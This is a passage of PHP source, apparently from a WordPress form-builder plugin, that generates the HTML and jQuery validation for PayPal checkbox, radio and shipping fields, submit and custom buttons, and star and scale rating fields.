								$checkedvalue=$_REQUEST['wdform_'.$id1."_element".$form_id.$key1];
								if(isset($checkedvalue))
									$param['w_choices_checked'][$key]='checked="checked"';		
							}
							else
								$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');
								
							$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'" '.$param['w_field_option_pos1'].'>'.$choice.'</label><div class="checkbox-div forlabs" '.$param['w_field_option_pos2'].'><input type="checkbox" id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.''.$key1.'" value="'.$param['w_choices_price'][$key].'" title="'.htmlspecialchars($choice).'" '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div><input type="hidden" name="wdform_'.$id1.'_element'.$form_id.$key1.'_label" value="'.htmlspecialchars($choice).'" /></div>';
						
						}
					}
          
              $rep.='<div id="wdform_'.$id1.'_div'.$form_id.'">';
              if($param['w_quantity']=="yes") {
                $rep.='<div class="paypal-property"><label class="mini_label" style="margin: 0px 5px;">'.(__("Quantity", 'form_maker')).'</label><input type="text" value="'.(isset($_POST['wdform_'.$id1."_element_quantity".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_element_quantity".$form_id])) : $param['w_quantity_value']).'" id="wdform_'.$id1.'_element_quantity'.$form_id.'" name="wdform_'.$id1.'_element_quantity'.$form_id.'" class="wdform-quantity"></div>';
              }
              if($param['w_property'][0]) {
                foreach($param['w_property'] as $key => $property) {
                  $rep.='
                  <div class="paypal-property">
                  <div style="display:inline-block;">
                  <label class="mini_label" id="wdform_'.$id1.'_property_label_'.$form_id.''.$key.'" style="margin-right: 5px;">'.$property.'</label>
                  <select id="wdform_'.$id1.'_property'.$form_id.''.$key.'" name="wdform_'.$id1.'_property'.$form_id.''.$key.'" style="margin: 2px 0px;">';
                  $param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);
                  $param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   
                  foreach($param['w_property_values'][$key] as $subkey => $property_value) {
                    $rep.='<option id="wdform_'.$id1.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'" '.(isset($_POST['wdform_'.$id1.'_property'.$form_id.''.$key]) && esc_html(stripslashes($_POST['wdform_'.$id1.'_property'.$form_id.''.$key])) == $property_value ? 'selected="selected"' : "").'>'.$property_value.'</option>';
                  }
                  $rep.='</select></div></div>';
                }
              }
              $rep.='</div></div></div>';              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(x.find(jQuery("div[wdid='.$id1.'] input:checked")).length == 0)
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    
                    return false;
                  }						
                }
                ';
              }
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_label'.$form_id.'\"  />").val((x.find(jQuery("div[wdid='.$id1.'] input:checked")).length != 0) ? jQuery("#"+x.find(jQuery("div[wdid='.$id1.'] input:checked")).attr("id").replace("element", "elementlabel_")) : "").appendTo("#form'.$form_id.'");
                ';
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_quantity_label'.$form_id.'\"  />").val("'.(__("Quantity", 'form_maker')).'").appendTo("#form'.$form_id.'");
                ';
              foreach($param['w_property'] as $key => $property)
              {
                $onsubmit_js.='
                  jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_property_label'.$form_id.$key.'\"  />").val("'.$property.'").appendTo("#form'.$form_id.'");
                  ';
              }
              break;
            }

            case 'type_paypal_radio': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class','w_property','w_property_values','w_quantity','w_quantity_value');
              $temp=$params;
			  if(strpos($temp, 'w_field_option_pos') > -1)
				$params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos', 'w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_choices_params', 'w_class', 'w_property','w_property_values','w_quantity','w_quantity_value');
						
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              if(!isset($param['w_field_option_pos']))
				$param['w_field_option_pos'] = 'left';
				
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
			  $param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none
			  !important;'" : "");
			  $param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin-right: 8px !important; display: inline-block !important;'" : "");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_price']	= explode('***',$param['w_choices_price']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
              $param['w_property']	= explode('***',$param['w_property']);
              $param['w_property_values']	= explode('***',$param['w_property_values']);
              if(isset($param['w_choices_params']))
				$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
				
              foreach($param['w_choices_checked'] as $key => $choices_checked ) {
                $param['w_choices_checked'][$key]=($choices_checked=='true' ? 'checked="checked"' : '');
              }
                
              $rep='<div type="type_paypal_radio" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';">';
            
              $total_queries = 0;
             foreach($param['w_choices'] as $key => $choice)
					{
						$key1 = $key + $total_queries;
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$choices_labels =array();
							$choices_values =array();
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
						
							
							$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));
							$table = $label_table_and_column[0];
							$label_column = $label_table_and_column[1];
							if($label_column)
							{
								$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);					
							}	

							$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_price'][$key]));
							$value_column = $value_table_and_column[1];

							if($value_column)
							{
								$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);
							}		

							$columns_count_radio = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);
							
							if(array_filter($choices_labels) || array_filter($choices_values))
							{
								$total_queries = $total_queries + $columns_count_radio-1;
								for($k=0; $k<$columns_count_radio; $k++)
								{
									$choice_label = isset($choices_labels) ? $choices_labels[$k] : '';
									$choice_value = isset($choices_values) ? (float)$choices_values[$k][0] : '';
			
									if(isset($post_value))
										$param['w_choices_checked'][$key]=(($post_value==$choice_value && htmlspecialchars($choice_label)==htmlspecialchars($_REQUEST['wdform_'.$id1."_element_label".$form_id])) ? 'checked="checked"' : '');
									else
										$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');	
		
									$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" '.$param['w_field_option_pos1'].'>'.$choice_label[0].'</label><div class="radio-div forlabs" '.$param['w_field_option_pos2'].'><input type="radio" id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$choice_value.'" title="'.htmlspecialchars($choice_label[0]).'" '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div></div>';
								}
							}			
						}
						else
						{
							if(isset($post_value))
								$param['w_choices_checked'][$key]=(($post_value==$param['w_choices_price'][$key] && htmlspecialchars($choice)==htmlspecialchars($_REQUEST['wdform_'.$id1."_element_label".$form_id])) ? 'checked="checked"' : '');
							else
								$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');	
								
							$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'" '.$param['w_field_option_pos1'].'>'.$choice.'</label><div class="radio-div forlabs" '.$param['w_field_option_pos2'].'><input type="radio" id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$param['w_choices_price'][$key].'" title="'.htmlspecialchars($choice).'" '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div></div>';
						}
					}
			   $rep.='<div id="wdform_'.$id1.'_div'.$form_id.'">';
              if($param['w_quantity']=="yes") {
                $rep.='<div class="paypal-property"><label class="mini_label" style="margin: 0px 5px;">'.(__("Quantity", 'form_maker')).'</label><input type="text" value="'.(isset($_POST['wdform_'.$id1."_element_quantity".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_element_quantity".$form_id])) : $param['w_quantity_value']).'" id="wdform_'.$id1.'_element_quantity'.$form_id.'" name="wdform_'.$id1.'_element_quantity'.$form_id.'" class="wdform-quantity"></div>';
              }
              if($param['w_property'][0])	{				
                foreach($param['w_property'] as $key => $property) {
                  $rep.='
                  <div class="paypal-property">
                  <div style="width:150px; display:inline-block;">
                  <label class="mini_label" id="wdform_'.$id1.'_property_label_'.$form_id.''.$key.'" style="margin-right: 5px;">'.$property.'</label>
                  <select id="wdform_'.$id1.'_property'.$form_id.''.$key.'" name="wdform_'.$id1.'_property'.$form_id.''.$key.'" style="margin: 2px 0px;">';
                  $param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);
                  $param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   
                  foreach($param['w_property_values'][$key] as $subkey => $property_value) {
                    $rep.='<option id="wdform_'.$id1.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'" '.(isset($_POST['wdform_'.$id1.'_property'.$form_id.''.$key]) && esc_html(stripslashes($_POST['wdform_'.$id1.'_property'.$form_id.''.$key])) == $property_value ? 'selected="selected"' : "").'>'.$property_value.'</option>';
                  }
                  $rep.='</select></div></div>';
                }
              }
              $rep.='</div></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(x.find(jQuery("div[wdid='.$id1.'] input:checked")).length == 0)
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    
                    return false;
                  }						
                }
                ';		
              }
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_label'.$form_id.'\" />").val(
                jQuery("label[for=\'"+jQuery("input[name^=\'wdform_'.$id1.'_element'.$form_id.'\']:checked").attr("id")+"\']").eq(0).text()
                ).appendTo("#form'.$form_id.'");

                ';
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_quantity_label'.$form_id.'\"  />").val("'.(__("Quantity", 'form_maker')).'").appendTo("#form'.$form_id.'");
                ';
              foreach($param['w_property'] as $key => $property)
              {
                $onsubmit_js.='
                  jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_property_label'.$form_id.$key.'\"  />").val("'.$property.'").appendTo("#form'.$form_id.'");
                  ';
              }
              break;
            }
            

            case 'type_paypal_shipping': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');
              $temp=$params;
              if(strpos($temp, 'w_field_option_pos') > -1)
				$params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos', 'w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_choices_params', 'w_class');
				
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp); 
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              
              if($temp) {
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
			  if(!isset($param['w_field_option_pos']))
						$param['w_field_option_pos'] = 'left';
						
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
			  $param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none
			  !important;'" : "");
			  $param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin:3px 8px 0 0 !important; display: inline-block !important;'" : "");
					
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_price']	= explode('***',$param['w_choices_price']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
              if(isset($param['w_choices_params']))
				$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
						
              foreach($param['w_choices_checked'] as $key => $choices_checked ) {
                $param['w_choices_checked'][$key]=($choices_checked=='true' ? 'checked="checked"' : '');
              }
              $rep='<div type="type_paypal_shipping" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';">';
              $total_queries = 0;
             foreach($param['w_choices'] as $key => $choice)
					{
						$key1 = $key + $total_queries;
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{			
							$choices_labels =array();
							$choices_values =array();
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
						
							
							$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));
							$table = $label_table_and_column[0];
							$label_column = $label_table_and_column[1];
							if($label_column)
							{
								$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);
						
							}	

							$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_price'][$key]));
							$value_column = $value_table_and_column[1];

							if($value_column)
							{
								$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);
							}		

							$columns_count_shipping = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);
							
							if(array_filter($choices_labels) || array_filter($choices_values))
							{
								$total_queries = $total_queries + $columns_count_shipping-1;
								for($k=0; $k<$columns_count_shipping; $k++)
								{
									$choice_label = isset($choices_labels) ? $choices_labels[$k][0] : '';
									$choice_value = isset($choices_values) ? (float)$choices_values[$k][0] : '';
			
									if(isset($post_value))
										$param['w_choices_checked'][$key]=(($post_value==$choice_value && htmlspecialchars($choice_label)==htmlspecialchars($_REQUEST['wdform_'.$id1."_element_label".$form_id])) ? 'checked="checked"' : '');
									else
										$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');	
										
									$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" '.$param['w_field_option_pos1'].'>'.$choice_label.'</label><div class="radio-div forlabs" '.$param['w_field_option_pos2'].'><input type="radio" id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$choice_value.'" title="'.htmlspecialchars($choice_label[0]).'" '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div></div>';
								}	
							}	
						}
						else
						{
							if(isset($post_value))
								$param['w_choices_checked'][$key]=(($post_value==$param['w_choices_price'][$key] && htmlspecialchars($choice)==htmlspecialchars($_REQUEST['wdform_'.$id1."_element_label".$form_id])) ? 'checked="checked"' : '');
							else
								$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');	

							$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'" '.$param['w_field_option_pos1'].'>'.$choice.'</label><div class="radio-div forlabs" '.$param['w_field_option_pos2'].'><input type="radio" id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$param['w_choices_price'][$key].'" title="'.htmlspecialchars($choice).'" '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div></div>';
						}
					}

              $rep.='</div></div>';
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(x.find(jQuery("div[wdid='.$id1.'] input:checked")).length == 0)
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    
                    return false;
                  }						
                }
                ';		
              }            
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_label'.$form_id.'\" />").val(
                jQuery("label[for=\'"+jQuery("input[name^=\'wdform_'.$id1.'_element'.$form_id.'\']:checked").attr("id")+"\']").eq(0).text()
                ).appendTo("#form'.$form_id.'");
                ';                
              break;
            }

            case 'type_submit_reset': {
              $params_names=array('w_submit_title','w_reset_title','w_class','w_act');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_act'] = ($param['w_act']=="false" ? 'style="display: none;"' : "");	              
              $rep='<div type="type_submit_reset" class="wdform-field"><div class="wdform-label-section" style="display: table-cell;"></div><div class="wdform-element-section '.$param['w_class'].'" style="display: table-cell;"><button type="button" class="button-submit" onclick="check_required'.$form_id.'(&quot;submit&quot;, &quot;'.$form_id.'&quot;);" '.$param['attributes'].'>'.$param['w_submit_title'].'</button><button type="button" class="button-reset" onclick="check_required'.$form_id.'(&quot;reset&quot;);" '.$param['w_act'].' '.$param['attributes'].'>'.$param['w_reset_title'].'</button></div></div>';            
              break;
            }
            
            case 'type_button': {
              $params_names=array('w_title','w_func','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_title']	= explode('***',$param['w_title']);
              $param['w_func']	= explode('***',$param['w_func']);
              $rep.='<div type="type_button" class="wdform-field"><div class="wdform-label-section" style="display: table-cell;"><span style="display: none;">button_'.$id1.'</span></div><div class="wdform-element-section '.$param['w_class'].'" style="display: table-cell;">';

              foreach($param['w_title'] as $key => $title) {
                $rep.='<button type="button" name="wdform_'.$id1.'_element'.$form_id.''.$key.'" onclick="'.$param['w_func'][$key].'" '.$param['attributes'].'>'.$title.'</button>';
              }
              $rep.='</div></div>';
              break;
            }
            
            case 'type_star_rating': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_field_label_col','w_star_amount','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $images = '';	
              for($i=0; $i<$param['w_star_amount']; $i++) {
                $images .= '<img id="wdform_'.$id1.'_star_'.$i.'_'.$form_id.'" src="' . WD_FMC_URL . '/images/star.png" >';                
                $onload_js .='jQuery("#wdform_'.$id1.'_star_'.$i.'_'.$form_id.'").mouseover(function() {change_src('.$i.',"wdform_'.$id1.'", '.$form_id.', "'.$param['w_field_label_col'].'");});';
                $onload_js .='jQuery("#wdform_'.$id1.'_star_'.$i.'_'.$form_id.'").mouseout(function() {reset_src('.$i.',"wdform_'.$id1.'", '.$form_id.');});';
                $onload_js .='jQuery("#wdform_'.$id1.'_star_'.$i.'_'.$form_id.'").click(function() {select_star_rating('.$i.',"wdform_'.$id1.'", '.$form_id.',"'.$param['w_field_label_col'].'", "'.$param['w_star_amount'].'");});';
              }
              
              $rep ='<div type="type_star_rating" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos2'].'"><div id="wdform_'.$id1.'_element'.$form_id.'" '.$param['attributes'].'>'.$images.'</div><input type="hidden" value="" id="wdform_'.$id1.'_selected_star_amount'.$form_id.'" name="wdform_'.$id1.'_selected_star_amount'.$form_id.'"></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_selected_star_amount'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    return false;
                  }
                }
                ';
              }
              $post = isset($_POST['wdform_'.$id1.'_selected_star_amount'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_selected_star_amount'.$form_id])) : NULL;
              if(isset($post)) {
                $onload_js .=' select_star_rating('.($post-1).',"wdform_'.$id1.'", '.$form_id.',"'.$param['w_field_label_col'].'", "'.$param['w_star_amount'].'");';
              }
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_star_amount'.$form_id.'\" value = \"'.$param['w_star_amount'].'\" />").appendTo("#form'.$form_id.'");
                ';
              break;
            }
            case 'type_scale_rating': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_mini_labels','w_scale_amount','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	              
              $w_mini_labels = explode('***',$param['w_mini_labels']);              
              $numbers = '';	
              $radio_buttons = '';	
              $to_check=0;
              $post_value = isset($_POST['wdform_'.$id1.'_scale_radio'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_scale_radio'.$form_id])) : NULL;
              if(isset($post_value)) {
                $to_check=$post_value;
              }
              for($i=1; $i<=$param['w_scale_amount']; $i++) {
                $numbers.= '<div  style="text-align: center; display: table-cell;"><span>'.$i.'</span></div>';
                $radio_buttons.= '<div style="text-align: center; display: table-cell;"><div class="radio-div"><input id="wdform_'.$id1.'_scale_radio'.$form_id.'_'.$i.'" name="wdform_'.$id1.'_scale_radio'.$form_id.'" value="'.$i.'" type="radio" '.( $to_check==$i ? 'checked="checked"' : '' ).'><label for="wdform_'.$id1.'_scale_radio'.$form_id.'_'.$i.'"></label></div></div>';
              }
      
              $rep ='<div type="type_scale_rating" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos2'].'"><div id="wdform_'.$id1.'_element'.$form_id.'" style="float: left;" '.$param['attributes'].'><label class="mini_label">'.$w_mini_labels[0].'</label><div  style="display: inline-table; vertical-align: middle;border-spacing: 7px;"><div style="display: table-row;">'.$numbers.'</div><div style="display: table-row;">'.$radio_buttons.'</div></div><label class="mini_label" >'.$w_mini_labels[1].'</label></div></div></div>';
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(x.find(jQuery("div[wdid='.$id1.'] input:checked")).length == 0)
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    
                    return false;
                  }						
                }
                ';		
              }
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_scale_amount'.$form_id.'\" value = \"'.$param['w_scale_amount'].'\" />").appendTo("#form'.$form_id.'");
                ';              
              break;
            }
            
            case 'type_spinner': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_field_width','w_field_min_value','w_field_max_value', 'w_field_step', 'w_field_value', 'w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_field_value']=(isset($_POST['wdform_'.$id1.'_element'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id])) : $param['w_field_value']);

              $rep ='<div type="type_spinner" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
